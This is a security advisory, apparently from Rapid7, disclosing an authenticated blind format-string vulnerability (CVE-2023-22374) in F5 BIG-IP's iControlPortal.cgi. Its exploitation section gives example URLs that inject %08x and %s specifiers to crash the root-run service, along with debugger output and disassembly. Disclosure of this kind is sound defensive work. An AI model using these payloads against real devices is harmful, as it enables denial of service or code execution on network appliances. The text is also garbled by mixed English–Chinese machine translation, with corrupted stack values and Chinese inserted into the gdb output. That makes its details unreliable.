Last updated at Wed, 01 Feb 2023 15:57:57 GMT
While following up our previous work on F5's BIG-IP devices, Rapid7 found an additional vulnerability in the appliance-mode REST interface; the vulnerability was assigned CVE-2023-22374. 我们于2022年12月6日向F5报告,现按照我们的要求进行披露 vulnerability disclosure policy.
我们发现的具体问题是一个身份验证格式字符串漏洞(CWE-134) in the SOAP interface (iControlPortal.cgi
),它以root身份运行,需要管理员登录才能访问. By inserting format string specifiers (such as %s
or %n
) into certain GET parameters, 攻击者可以使服务读取和写入从堆栈引用的内存地址. 除了作为经过身份验证的管理端点之外, 将公开的内存写入日志(使其成为盲目攻击). 很难影响读和写的具体地址, 这使得这个漏洞在实践中很难被利用(除了使服务崩溃之外). This has a CVSS score of 7.5 for standard mode deployments and 8.5 in appliance mode.
Products
这个问题只影响BIG-IP(不影响BIG-IQ),到目前为止还没有修复. The currently supported versions known to be vulnerable are:
- F5 BIG-IP 17.0.0
- F5 BIG-IP 16.1.2.2 - 16.1.3
- F5 BIG-IP 15.1.5.1 - 15.1.8
- F5 BIG-IP 14.1.4.6 - 14.1.5
- F5 BIG-IP 13.1.5
Discoverer
This issue was discovered by Ron Bowes of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.
Exploitation
The issue we are disclosing is a blind format string vulnerability,通过身份验证的攻击者可以在其中插入任意格式的字符串字符(例如 %d
, %x
, %s
, and %n
) into a query parameter, which are passed into the function syslog()
, which processes format-string specifiers. 这并不要求攻击者实际读取syslog条目—解析格式字符串的行为才是有问题的. That also means that the attacker can't read 内存,除非他们有额外的方法来读取syslog. By using the %s
specifier, 该服务可能会因为分段错误而崩溃(因为它试图将堆栈上的指针作为字符串解引用)。. Using %n
, 可以将任意数据写入堆栈上找到的任何指针,这取决于堆栈上存在的内容, this may be exploitable for remote code execution.
The issue occurs in WSDL=
parameter in the following authenticated administrative URL:
The value of the WSDL=
parameter is written to the syslog:
Nov 29 08:32:25 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile
If an attacker adds format-string characters to that argument, 它们将被处理,堆栈中的值可以写入syslog(攻击者无法看到这一点), so it's actually a blind format-string vulnerability). For example, this URL:
http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x
Might write the following, after expanding the %08x
格式化说明符到堆栈中的值(冒号只是为了可读性):
Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile: 0000004 c: 0000004 c: 08年cb31bc: 08年cba210:08cc4954:01000000: ffeaa378: f5aa8000
Once again, we should note that an attacker cannot see this log, and therefore cannot use this to disclose memory. We can, however, use a %s
格式说明符,告诉服务尝试从堆栈中呈现字符串. 如果堆栈上的值不是有效的内存地址(例如第一个值,它是 0x0000004c
), the process will crash with a segmentation fault. We can also use the %n
格式说明符将(大多数情况下)任意值写入堆栈上的内存地址.
Here is an example of using the %s
specifier in a request:
http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%s
如果我们将其发送到服务器(作为经过身份验证的请求),服务将崩溃. We can attach a debugger to the server process to validate:
[root@bigip:Active:Standalone] config # /tmp/gdb-7.10.1-x64 -q --pid=4335[...](gdb) contContinuing.
Program received signal SIGSEGV, Segmentation fault.0xf55e3085 in vfprintf () from /lib/libc.so.6(gdb) bt#0 0xf55e3085 in vfprintf () from /lib/libc.so.6#1 0xf568f21f in __vsyslog_chk () from /lib/libc.so.6#2 0xf568f317 in syslog () from /lib/libc.so.6#3 0x0810cc1f在PortalDispatch::HandleWSDLRequest(char*) ()#4 0x08109f08在iControlPortal::run(int) ()#5 0x0810947f in main ()
The actual vulnerable code in PortalDispatch::HandleWSDLRequest
in iControlPortal.cgi
is (in a disassembler):
.text:0810CBF2 loc_810CBF2: ; CODE XREF: PortalDispatch::HandleWSDLRequest(char *)+DD↑j.text:0810CBF2 pop ecx.text:0810CBF3 pop edi.text:0810CBF4 push esi ; Query string.text:0810CBF5 push eax.text:0810CBF6 call __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<>(std::basic_ostream> &,char const*).text:0810CBFB pop eax.text:0810CBFC pop edx.text:0810CBFD lea eax, [ebp+var_8C8].text:0810CC03 lea edi, [ebp+format].text:0810CC09 push eax.text:0810CC0A push edi.text:0810CC0B call __ZNKSt15basic_stringbufIcSt11char_traitsIcESaIcEE3strEv ; std::basic_stringbuf,std::allocator>::str(void)
.text:0810CC0B ; } // starts at 810CBE6.text:0810CC10 pop eax.text:0810CC11 push dword ptr [ebp+format].text:0810CC17 push 6.text:0810CC19 ; try {.text:0810CC19 call _syslog ; <--- Vulnerable call to syslog().text:0810CC19 ; } // starts at 810CC19
A String
object (that contains query:
)将查询字符串附加到其上,然后直接传递给 _syslog()
, which processes format string characters.
Impact
成功的攻击最可能造成的影响是使服务器进程崩溃. 熟练的攻击者可能会开发远程代码执行漏洞, 哪个将以root用户在F5 BIG-IP设备上运行代码.
Remediation
目前在已发布的BIG-IP软件版本中没有修复此问题. F5已经表示将会提供一个工程修复程序. 应该强调的是,这个问题只能作为易受攻击设备的认证用户来利用. So, 最终用户应该将对管理端口的访问限制为仅受信任的个人(链接的KB提供了一个要绑定的过程) webd
to localhost) which is usually good advice anyway.
Rapid7 customers
针对CVE-2023-22374的身份验证漏洞检查将于今天(2月1日)发布仅限内容的版本. Because F5's hotfix policy 这些修补程序是“不保证可用性”的吗,请注意,InsightVM中的漏洞检查不会考虑热修复程序.
Timeline
- December, 2022 - Discovered the vulnerability
- Tue, Dec 6, 2022 - Reported to F5 SIRT
- 2022年12月7日星期三- F5转发给F5产品工程团队进行分析
- 2022年12月22日,星期四——F5确认了这个问题,并开始着手修复
- 2023年1月4日星期三-向CERT/CC报告的问题(vrf# 23-01-TVJZN)
- Wed, Jan 18, 2023 - F5 provided a draft security advisory, CVSS scoring, and CVE-2023-22374 reservation
- Wed, Feb 1, 2023 - This public disclosure and F5's advisory published